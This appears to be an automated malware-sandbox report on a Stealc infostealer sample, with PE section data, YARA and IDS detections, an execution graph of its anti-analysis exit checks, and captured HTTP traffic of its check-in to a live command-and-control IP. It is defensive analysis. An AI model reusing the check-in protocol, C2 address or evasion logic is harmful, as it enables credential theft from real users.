                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], cl
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add ecx, dword ptr [edx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 00h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x2e70000x67600567854892c55d978421b55ae308646abunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x2ea0000x2a80000x200c93c1008486e6a181c0181116a00c6b4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              oxrzanjf0x5920000x1a20000x1a1e0044e56afcfaacb928272b38f7e52b3c9aFalse0.9948995569099611data7.953822879686721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              lnkngpyb0x7340000x10000x4003b2b09a6725a93942fdd5bdf1df16a8fFalse0.775390625data6.076236953350956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x7350000x30000x22005f9762b3c4eaab5115f483d7b5de243eFalse0.03699448529411765DOS executable (COM)0.3288463041264524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-29T04:01:10.465335+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 29, 2024 04:01:09.282229900 CET4973080192.168.2.4185.215.113.206
                              Oct 29, 2024 04:01:09.287568092 CET8049730185.215.113.206192.168.2.4
                              Oct 29, 2024 04:01:09.287669897 CET4973080192.168.2.4185.215.113.206
                              Oct 29, 2024 04:01:09.289606094 CET4973080192.168.2.4185.215.113.206
                              Oct 29, 2024 04:01:09.294817924 CET8049730185.215.113.206192.168.2.4
                              Oct 29, 2024 04:01:10.180682898 CET8049730185.215.113.206192.168.2.4
                              Oct 29, 2024 04:01:10.180799961 CET4973080192.168.2.4185.215.113.206
                              Oct 29, 2024 04:01:10.184680939 CET4973080192.168.2.4185.215.113.206
                              Oct 29, 2024 04:01:10.190126896 CET8049730185.215.113.206192.168.2.4
                              Oct 29, 2024 04:01:10.465209961 CET8049730185.215.113.206192.168.2.4
                              Oct 29, 2024 04:01:10.465334892 CET4973080192.168.2.4185.215.113.206
                              Oct 29, 2024 04:01:14.134634018 CET4973080192.168.2.4185.215.113.206

                              HTTP Request Dependency Graph

                              • 185.215.113.206

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730185.215.113.206804408C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Oct 29, 2024 04:01:09.289606094 CET90OUTGET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Oct 29, 2024 04:01:10.180682898 CET203INHTTP/1.1 200 OK
                              Date: Tue, 29 Oct 2024 03:01:10 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Oct 29, 2024 04:01:10.184680939 CET412OUTPOST /6c4adf523b719729.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECF
                              Host: 185.215.113.206
                              Content-Length: 210
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 44 39 30 33 34 32 42 34 38 35 33 30 32 35 39 39 37 34 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 2d 2d 0d 0a
                              Data Ascii: ------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="hwid"0ED90342B485302599741------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="build"tale------AAAKEBGDAFHIIDHIIECF--
                              Oct 29, 2024 04:01:10.465209961 CET210INHTTP/1.1 200 OK
                              Date: Tue, 29 Oct 2024 03:01:10 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:0
                              Start time:23:01:06
                              Start date:28/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xea0000
                              File size:2'149'888 bytes
                              MD5 hash:1F9BBFE42E611B314849010FB1BBE51C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1769403587.0000000005850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:3%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:3.5%
                                Total number of Nodes:1327
                                Total number of Limit Nodes:24
                                execution_graph 36383 eb6c90 36428 ea22a0 36383->36428 36407 eb6d04 36408 ebacc0 4 API calls 36407->36408 36409 eb6d0b 36408->36409 36410 ebacc0 4 API calls 36409->36410 36411 eb6d12 36410->36411 36412 ebacc0 4 API calls 36411->36412 36413 eb6d19 36412->36413 36414 ebacc0 4 API calls 36413->36414 36415 eb6d20 36414->36415 36580 ebabb0 36415->36580 36417 eb6d29 36418 eb6dac 36417->36418 36420 eb6d62 OpenEventA 36417->36420 36584 eb6bc0 GetSystemTime 36418->36584 36423 eb6d79 36420->36423 36424 eb6d95 CloseHandle Sleep 36420->36424 36427 eb6d81 CreateEventA 36423->36427 36426 eb6daa 36424->36426 36425 eb6db6 CloseHandle ExitProcess 36426->36417 36427->36418 36781 ea4610 36428->36781 36430 ea22b4 36431 ea4610 2 API calls 36430->36431 36432 ea22cd 36431->36432 36433 ea4610 2 API calls 36432->36433 36434 ea22e6 36433->36434 36435 ea4610 2 API calls 36434->36435 36436 ea22ff 36435->36436 36437 ea4610 2 API calls 36436->36437 36438 ea2318 36437->36438 36439 ea4610 2 API calls 36438->36439 36440 ea2331 36439->36440 36441 ea4610 2 API calls 36440->36441 36442 ea234a 36441->36442 36443 ea4610 2 API calls 36442->36443 36444 ea2363 36443->36444 36445 ea4610 2 API calls 36444->36445 36446 ea237c 36445->36446 36447 ea4610 2 API calls 36446->36447 36448 ea2395 36447->36448 36449 ea4610 2 API calls 36448->36449 36450 ea23ae 36449->36450 36451 ea4610 2 API calls 36450->36451 36452 ea23c7 36451->36452 36453 ea4610 2 API calls 36452->36453 36454 ea23e0 36453->36454 36455 ea4610 2 API calls 36454->36455 36456 ea23f9 36455->36456 36457 ea4610 2 API calls 36456->36457 36458 ea2412 36457->36458 36459 ea4610 2 API calls 36458->36459 36460 ea242b 36459->36460 36461 ea4610 2 API calls 36460->36461 36462 ea2444 36461->36462 36463 ea4610 2 API calls 36462->36463 36464 ea245d 36463->36464 36465 ea4610 2 API calls 36464->36465 36466 ea2476 36465->36466 36467 ea4610 2 API calls 36466->36467 36468 ea248f 36467->36468 36469 ea4610 2 API calls 36468->36469 36470 ea24a8 36469->36470 36471 ea4610 2 API calls 36470->36471 36472 ea24c1 36471->36472 36473 ea4610 2 API calls 36472->36473 36474 ea24da 36473->36474 36475 ea4610 2 API calls 36474->36475 36476 ea24f3 36475->36476 36477 ea4610 2 API calls 36476->36477 36478 ea250c 36477->36478 36479 ea4610 2 API calls 36478->36479 36480 ea2525 36479->36480 36481 ea4610 2 API calls 36480->36481 36482 ea253e 36481->36482 36483 ea4610 2 API calls 36482->36483 36484 ea2557 36483->36484 36485 ea4610 2 API calls 36484->36485 36486 ea2570 36485->36486 36487 ea4610 2 API calls 36486->36487 36488 ea2589 36487->36488 36489 ea4610 2 API calls 36488->36489 36490 ea25a2 36489->36490 36491 ea4610 2 API calls 36490->36491 36492 ea25bb 36491->36492 36493 ea4610 2 API calls 36492->36493 36494 ea25d4 36493->36494 36495 ea4610 2 API calls 36494->36495 36496 ea25ed 36495->36496 36497 ea4610 2 API calls 36496->36497 36498 ea2606 36497->36498 36499 ea4610 2 API calls 36498->36499 36500 ea261f 36499->36500 36501 ea4610 2 API calls 36500->36501 36502 ea2638 36501->36502 36503 ea4610 2 API calls 36502->36503 36504 ea2651 36503->36504 36505 ea4610 2 API calls 36504->36505 36506 ea266a 36505->36506 36507 ea4610 2 API calls 36506->36507 36508 ea2683 36507->36508 36509 ea4610 2 API calls 36508->36509 36510 ea269c 36509->36510 36511 ea4610 2 API calls 36510->36511 36512 ea26b5 36511->36512 36513 ea4610 2 API calls 36512->36513 36514 ea26ce 36513->36514 36515 eb9bb0 36514->36515 36786 eb9aa0 GetPEB 36515->36786 36517 eb9bb8 36518 eb9bca 36517->36518 36519 eb9de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 36517->36519 36524 eb9bdc 21 API calls 36518->36524 36520 eb9e5d 36519->36520 36521 eb9e44 GetProcAddress 36519->36521 36522 eb9e96 36520->36522 36523 eb9e66 GetProcAddress GetProcAddress 36520->36523 36521->36520 36525 eb9eb8 36522->36525 36526 eb9e9f GetProcAddress 36522->36526 36523->36522 36524->36519 36527 eb9ed9 36525->36527 36528 eb9ec1 GetProcAddress 36525->36528 36526->36525 36529 eb9ee2 GetProcAddress GetProcAddress 36527->36529 36530 eb6ca0 36527->36530 36528->36527 36529->36530 36531 ebaa50 36530->36531 36532 ebaa60 36531->36532 36533 eb6cad 36532->36533 36534 ebaa8e lstrcpy 36532->36534 36535 ea11d0 36533->36535 36534->36533 36536 ea11e8 36535->36536 36537 ea120f ExitProcess 36536->36537 36538 ea1217 36536->36538 36539 ea1160 GetSystemInfo 36538->36539 36540 ea117c ExitProcess 36539->36540 36541 ea1184 36539->36541 36542 ea1110 GetCurrentProcess VirtualAllocExNuma 36541->36542 36543 ea1149 36542->36543 36544 ea1141 ExitProcess 36542->36544 36787 ea10a0 VirtualAlloc 36543->36787 36547 ea1220 36791 eb8b40 36547->36791 36550 ea129a 36553 eb6a10 GetUserDefaultLangID 36550->36553 36551 ea1249 36551->36550 36552 ea1292 ExitProcess 36551->36552 36554 eb6a73 36553->36554 36555 eb6a32 36553->36555 36561 ea1190 36554->36561 36555->36554 36556 eb6a6b ExitProcess 36555->36556 36557 eb6a4d ExitProcess 36555->36557 36558 eb6a43 ExitProcess 36555->36558 36559 eb6a61 ExitProcess 36555->36559 36560 eb6a57 ExitProcess 36555->36560 36556->36554 36562 eb7a70 3 API calls 36561->36562 36563 ea119e 36562->36563 36564 ea11cc 36563->36564 36565 eb79e0 3 API calls 36563->36565 36568 eb79e0 GetProcessHeap RtlAllocateHeap GetUserNameA 36564->36568 36566 ea11b7 36565->36566 36566->36564 36567 ea11c4 ExitProcess 36566->36567 36569 eb6cd0 36568->36569 36570 eb7a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 36569->36570 36571 eb6ce3 36570->36571 36572 ebacc0 36571->36572 36793 ebaa20 36572->36793 36574 ebacd1 lstrlen 36576 ebacf0 36574->36576 36575 ebad28 36794 ebaab0 36575->36794 36576->36575 36578 ebad0a lstrcpy lstrcat 36576->36578 36578->36575 36579 ebad34 36579->36407 36581 ebabcb 36580->36581 36582 ebac1b 36581->36582 36583 ebac09 lstrcpy 36581->36583 36582->36417 36583->36582 36798 eb6ac0 36584->36798 36586 eb6c2e 36587 eb6c38 sscanf 36586->36587 36827 ebab10 36587->36827 36589 eb6c4a SystemTimeToFileTime SystemTimeToFileTime 36590 eb6c6e 36589->36590 36591 eb6c80 36589->36591 36590->36591 36592 eb6c78 ExitProcess 36590->36592 36593 eb5d60 36591->36593 36594 eb5d6d 36593->36594 36595 ebaa50 lstrcpy 36594->36595 36596 eb5d7e 36595->36596 36829 ebab30 lstrlen 36596->36829 36599 ebab30 2 API calls 36600 eb5db4 36599->36600 36601 ebab30 2 API calls 36600->36601 36602 eb5dc4 36601->36602 36833 eb6680 36602->36833 36605 ebab30 2 API calls 36606 eb5de3 36605->36606 36607 ebab30 2 API calls 36606->36607 36608 eb5df0 36607->36608 36609 ebab30 2 API calls 36608->36609 36610 eb5dfd 36609->36610 36611 ebab30 2 API calls 36610->36611 36612 eb5e49 36611->36612 36842 ea26f0 36612->36842 36620 eb5f13 36621 eb6680 lstrcpy 36620->36621 36622 eb5f25 36621->36622 36623 ebaab0 lstrcpy 36622->36623 36624 eb5f42 36623->36624 36625 ebacc0 4 API calls 36624->36625 36626 eb5f5a 36625->36626 36627 ebabb0 lstrcpy 36626->36627 36628 eb5f66 36627->36628 36629 ebacc0 4 API calls 36628->36629 36630 eb5f8a 36629->36630 36631 ebabb0 lstrcpy 36630->36631 36632 eb5f96 36631->36632 36633 ebacc0 4 API calls 36632->36633 36634 eb5fba 36633->36634 36635 ebabb0 lstrcpy 36634->36635 36636 eb5fc6 36635->36636 36637 ebaa50 lstrcpy 36636->36637 36638 eb5fee 36637->36638 37568 eb7690 GetWindowsDirectoryA 36638->37568 36641 ebaab0 lstrcpy 36642 eb6008 36641->36642 37578 ea48d0 36642->37578 36644 eb600e 37723 eb19f0 36644->37723 36646 eb6016 36647 ebaa50 lstrcpy 36646->36647 36648 eb6039 36647->36648 36649 ea1590 lstrcpy 36648->36649 36650 eb604d 36649->36650 37739 ea59b0 34 API calls ctype 36650->37739 36652 eb6053 37740 eb1280 lstrlen lstrcpy 36652->37740 36654 eb605e 36655 ebaa50 lstrcpy 36654->36655 36656 eb6082 36655->36656 36657 ea1590 lstrcpy 36656->36657 36658 eb6096 36657->36658 37741 ea59b0 34 API calls ctype 36658->37741 36660 eb609c 37742 eb0fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 36660->37742 36662 eb60a7 36663 ebaa50 lstrcpy 36662->36663 36664 eb60c9 36663->36664 36665 ea1590 lstrcpy 36664->36665 36666 eb60dd 36665->36666 37743 ea59b0 34 API calls ctype 36666->37743 36668 eb60e3 37744 eb1170 StrCmpCA lstrlen lstrcpy 36668->37744 36670 eb60ee 36671 ea1590 lstrcpy 36670->36671 36672 eb6105 36671->36672 37745 eb1c60 115 API calls 36672->37745 36674 eb610a 36675 ebaa50 lstrcpy 36674->36675 36676 eb6126 36675->36676 37746 ea5000 7 API calls 36676->37746 36678 eb612b 36679 ea1590 lstrcpy 36678->36679 36680 eb61ab 36679->36680 37747 eb08a0 287 API calls 36680->37747 36682 eb61b0 36683 ebaa50 lstrcpy 36682->36683 36684 eb61d6 36683->36684 36685 ea1590 lstrcpy 36684->36685 36686 eb61ea 36685->36686 37748 ea59b0 34 API calls ctype 36686->37748 36688 eb61f0 37749 eb13c0 StrCmpCA lstrlen lstrcpy 36688->37749 36690 eb61fb 36691 ea1590 lstrcpy 36690->36691 36692 eb623b 36691->36692 37750 ea1ec0 59 API calls 36692->37750 36694 eb6240 36695 eb62e2 36694->36695 36696 eb6250 36694->36696 36697 ebaab0 lstrcpy 36695->36697 36698 ebaa50 lstrcpy 36696->36698 36699 eb62f5 36697->36699 36700 eb6270 36698->36700 36701 ea1590 lstrcpy 36699->36701 36702 ea1590 lstrcpy 36700->36702 36703 eb6309 36701->36703 36704 eb6284 36702->36704 37754 ea59b0 34 API calls ctype 36703->37754 37751 ea59b0 34 API calls ctype 36704->37751 36707 eb628a 37752 eb1520 19 API calls ctype 36707->37752 36708 eb630f 37755 eb37b0 31 API calls 36708->37755 36711 eb62da 36714 eb635b 36711->36714 36716 ea1590 lstrcpy 36711->36716 36712 eb6295 36713 ea1590 lstrcpy 36712->36713 36715 eb62d5 36713->36715 36718 eb6380 36714->36718 36721 ea1590 lstrcpy 36714->36721 37753 eb4010 67 API calls 36715->37753 36720 eb6337 36716->36720 36719 eb63a5 36718->36719 36722 ea1590 lstrcpy 36718->36722 36724 eb63ca 36719->36724 36728 ea1590 lstrcpy 36719->36728 37756 eb4300 58 API calls ctype 36720->37756 36725 eb637b 36721->36725 36726 eb63a0 36722->36726 36729 eb63ef 36724->36729 36735 ea1590 lstrcpy 36724->36735 37758 eb49d0 88 API calls ctype 36725->37758 37759 eb4e00 61 API calls ctype 36726->37759 36727 eb633c 36733 ea1590 lstrcpy 36727->36733 36734 eb63c5 36728->36734 36731 eb6414 36729->36731 36737 ea1590 lstrcpy 36729->36737 36739 eb6439 36731->36739 36745 ea1590 lstrcpy 36731->36745 36738 eb6356 36733->36738 37760 eb4fc0 65 API calls 36734->37760 36736 eb63ea 36735->36736 37761 eb5190 63 API calls ctype 36736->37761 36743 eb640f 36737->36743 37757 eb5350 44 API calls 36738->37757 36741 eb6460 36739->36741 36746 ea1590 lstrcpy 36739->36746 36747 eb6503 36741->36747 36748 eb6470 36741->36748 37762 ea7770 107 API calls ctype 36743->37762 36750 eb6434 36745->36750 36751 eb6459 36746->36751 36752 ebaab0 lstrcpy 36747->36752 36753 ebaa50 lstrcpy 36748->36753 37763 eb52a0 61 API calls ctype 36750->37763 37764 eb91a0 46 API calls ctype 36751->37764 36756 eb6516 36752->36756 36757 eb6491 36753->36757 36758 ea1590 lstrcpy 36756->36758 36759 ea1590 lstrcpy 36757->36759 36760 eb652a 36758->36760 36761 eb64a5 36759->36761 37768 ea59b0 34 API calls ctype 36760->37768 37765 ea59b0 34 API calls ctype 36761->37765 36764 eb6530 37769 eb37b0 31 API calls 36764->37769 36765 eb64ab 37766 eb1520 19 API calls ctype 36765->37766 36768 eb64fb 36772 ebaab0 lstrcpy 36768->36772 36769 eb64b6 36770 ea1590 lstrcpy 36769->36770 36771 eb64f6 36770->36771 37767 eb4010 67 API calls 36771->37767 36774 eb654c 36772->36774 36775 ea1590 lstrcpy 36774->36775 36776 eb6560 36775->36776 37770 ea59b0 34 API calls ctype 36776->37770 36778 eb656c 36780 eb6588 36778->36780 37771 eb68d0 9 API calls ctype 36778->37771 36780->36425 36782 ea4621 RtlAllocateHeap 36781->36782 36785 ea4671 VirtualProtect 36782->36785 36785->36430 36786->36517 36789 ea10c2 ctype 36787->36789 36788 ea10fd 36788->36547 36789->36788 36790 ea10e2 VirtualFree 36789->36790 36790->36788 36792 ea1233 GlobalMemoryStatusEx 36791->36792 36792->36551 36793->36574 36795 ebaad2 36794->36795 36796 ebaafc 36795->36796 36797 ebaaea lstrcpy 36795->36797 36796->36579 36797->36796 36799 ebaa50 lstrcpy 36798->36799 36800 eb6ad3 36799->36800 36801 ebacc0 4 API calls 36800->36801 36802 eb6ae5 36801->36802 36803 ebabb0 lstrcpy 36802->36803 36804 eb6aee 36803->36804 36805 ebacc0 4 API calls 36804->36805 36806 eb6b07 36805->36806 36807 ebabb0 lstrcpy 36806->36807 36808 eb6b10 36807->36808 36809 ebacc0 4 API calls 36808->36809 36810 eb6b2a 36809->36810 36811 ebabb0 lstrcpy 36810->36811 36812 eb6b33 36811->36812 36813 ebacc0 4 API calls 36812->36813 36814 eb6b4c 36813->36814 36815 ebabb0 lstrcpy 36814->36815 36816 eb6b55 36815->36816 36817 ebacc0 4 API calls 36816->36817 36818 eb6b6f 36817->36818 36819 ebabb0 lstrcpy 36818->36819 36820 eb6b78 36819->36820 36821 ebacc0 4 API calls 36820->36821 36822 eb6b93 36821->36822 36823 ebabb0 lstrcpy 36822->36823 36824 eb6b9c 36823->36824 36825 ebaab0 lstrcpy 36824->36825 36826 eb6bb0 36825->36826 36826->36586 36828 ebab22 36827->36828 36828->36589 36830 ebab4f 36829->36830 36831 eb5da4 36830->36831 36832 ebab8b lstrcpy 36830->36832 36831->36599 36832->36831 36834 ebabb0 lstrcpy 36833->36834 36835 eb6693 36834->36835 36836 ebabb0 lstrcpy 36835->36836 36837 eb66a5 36836->36837 36838 ebabb0 lstrcpy 36837->36838 36839 eb66b7 36838->36839 36840 ebabb0 lstrcpy 36839->36840 36841 eb5dd6 36840->36841 36841->36605 36843 ea4610 2 API calls 36842->36843 36844 ea2704 36843->36844 36845 ea4610 2 API calls 36844->36845 36846 ea2727 36845->36846 36847 ea4610 2 API calls 36846->36847 36848 ea2740 36847->36848 36849 ea4610 2 API calls 36848->36849 36850 ea2759 36849->36850 36851 ea4610 2 API calls 36850->36851 36852 ea2786 36851->36852 36853 ea4610 2 API calls 36852->36853 36854 ea279f 36853->36854 36855 ea4610 2 API calls 36854->36855 36856 ea27b8 36855->36856 36857 ea4610 2 API calls 36856->36857 36858 ea27e5 36857->36858 36859 ea4610 2 API calls 36858->36859 36860 ea27fe 36859->36860 36861 ea4610 2 API calls 36860->36861 36862 ea2817 36861->36862 36863 ea4610 2 API calls 36862->36863 36864 ea2830 36863->36864 36865 ea4610 2 API calls 36864->36865 36866 ea2849 36865->36866 36867 ea4610 2 API calls 36866->36867 36868 ea2862 36867->36868 36869 ea4610 2 API calls 36868->36869 36870 ea287b 36869->36870 36871 ea4610 2 API calls 36870->36871 36872 ea2894 36871->36872 36873 ea4610 2 API calls 36872->36873 36874 ea28ad 36873->36874 36875 ea4610 2 API calls 36874->36875 36876 ea28c6 36875->36876 36877 ea4610 2 API calls 36876->36877 36878 ea28df 36877->36878 36879 ea4610 2 API calls 36878->36879 36880 ea28f8 36879->36880 36881 ea4610 2 API calls 36880->36881 36882 ea2911 36881->36882 36883 ea4610 2 API calls 36882->36883 36884 ea292a 36883->36884 36885 ea4610 2 API calls 36884->36885 36886 ea2943 36885->36886 36887 ea4610 2 API calls 36886->36887 36888 ea295c 36887->36888 36889 ea4610 2 API calls 36888->36889 36890 ea2975 36889->36890 36891 ea4610 2 API calls 36890->36891 36892 ea298e 36891->36892 36893 ea4610 2 API calls 36892->36893 36894 ea29a7 36893->36894 36895 ea4610 2 API calls 36894->36895 36896 ea29c0 36895->36896 36897 ea4610 2 API calls 36896->36897 36898 ea29d9 36897->36898 36899 ea4610 2 API calls 36898->36899 36900 ea29f2 36899->36900 36901 ea4610 2 API calls 36900->36901 36902 ea2a0b 36901->36902 36903 ea4610 2 API calls 36902->36903 36904 ea2a24 36903->36904 36905 ea4610 2 API calls 36904->36905 36906 ea2a3d 36905->36906 36907 ea4610 2 API calls 36906->36907 36908 ea2a56 36907->36908 36909 ea4610 2 API calls 36908->36909 36910 ea2a6f 36909->36910 36911 ea4610 2 API calls 36910->36911 36912 ea2a88 36911->36912 36913 ea4610 2 API calls 36912->36913 36914 ea2aa1 36913->36914 36915 ea4610 2 API calls 36914->36915 36916 ea2aba 36915->36916 36917 ea4610 2 API calls 36916->36917 36918 ea2ad3 36917->36918 36919 ea4610 2 API calls 36918->36919 36920 ea2aec 36919->36920 36921 ea4610 2 API calls 36920->36921 36922 ea2b05 36921->36922 36923 ea4610 2 API calls 36922->36923 36924 ea2b1e 36923->36924 36925 ea4610 2 API calls 36924->36925 36926 ea2b37 36925->36926 36927 ea4610 2 API calls 36926->36927 36928 ea2b50 36927->36928 36929 ea4610 2 API calls 36928->36929 36930 ea2b69 36929->36930 36931 ea4610 2 API calls 36930->36931 36932 ea2b82 36931->36932 36933 ea4610 2 API calls 36932->36933 36934 ea2b9b 36933->36934 36935 ea4610 2 API calls 36934->36935 36936 ea2bb4 36935->36936 36937 ea4610 2 API calls 36936->36937 36938 ea2bcd 36937->36938 36939 ea4610 2 API calls 36938->36939 36940 ea2be6 36939->36940 36941 ea4610 2 API calls 36940->36941 36942 ea2bff 36941->36942 36943 ea4610 2 API calls 36942->36943 36944 ea2c18 36943->36944 36945 ea4610 2 API calls 36944->36945 36946 ea2c31 36945->36946 36947 ea4610 2 API calls 36946->36947 36948 ea2c4a 36947->36948 36949 ea4610 2 API calls 36948->36949 36950 ea2c63 36949->36950 36951 ea4610 2 API calls 36950->36951 36952 ea2c7c 36951->36952 36953 ea4610 2 API calls 36952->36953 36954 ea2c95 36953->36954 36955 ea4610 2 API calls 36954->36955 36956 ea2cae 36955->36956 36957 ea4610 2 API calls 36956->36957 36958 ea2cc7 36957->36958 36959 ea4610 2 API calls 36958->36959 36960 ea2ce0 36959->36960 36961 ea4610 2 API calls 36960->36961 36962 ea2cf9 36961->36962 36963 ea4610 2 API calls 36962->36963 36964 ea2d12 36963->36964 36965 ea4610 2 API calls 36964->36965 36966 ea2d2b 36965->36966 36967 ea4610 2 API calls 36966->36967 36968 ea2d44 36967->36968 36969 ea4610 2 API calls 36968->36969 36970 ea2d5d 36969->36970 36971 ea4610 2 API calls 36970->36971 36972 ea2d76 36971->36972 36973 ea4610 2 API calls 36972->36973 36974 ea2d8f 36973->36974 36975 ea4610 2 API calls 36974->36975 36976 ea2da8 36975->36976 36977 ea4610 2 API calls 36976->36977 36978 ea2dc1 36977->36978 36979 ea4610 2 API calls 36978->36979 36980 ea2dda 36979->36980 36981 ea4610 2 API calls 36980->36981 36982 ea2df3 36981->36982 36983 ea4610 2 API calls 36982->36983 